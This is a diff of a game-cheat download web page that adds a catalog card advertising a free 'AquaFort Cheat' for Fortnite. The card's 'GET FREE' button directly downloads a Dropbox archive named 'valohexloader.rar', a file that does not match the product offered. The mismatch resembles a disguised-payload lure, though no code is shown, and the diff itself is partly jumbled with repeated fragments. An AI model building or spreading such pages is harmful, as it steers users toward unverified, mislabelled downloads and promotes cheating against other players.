--- a/index.html
+++ b/index.html
@@ -94,14 +94,16 @@
         </div>
     </div>
 
-    <div class="catalog">
-        <div class="title">
-            <h1>Top 8 products</h1>
-            <h2>The most popular products</h2>
-        </div>
-        ...
-         <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
-                <div>
+   <div class="catalog-block__item">
+    <div>
+        <img src="fortnite.svg" alt="" class="catalog-block__img">
+        <div class="catalog-block__item-title">AquaFort Cheat</div>
+        <div class="catalog-block__item-subtitle">AquaFortCheat contains a lot of functionality that will help you win royal battles</div>
+    </div>
+    <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
+    <div class="catalog-block__actual">#Actual</div>
+</div>
+
                     <img src="fortnite.svg" alt="" class="catalog-block__img">
                     <div class="catalog-block__item-title">AquaFort Cheat</div>
                     <div class="catalog-block__item-subtitle">AquaFortCheat contains a lot of functionality that will
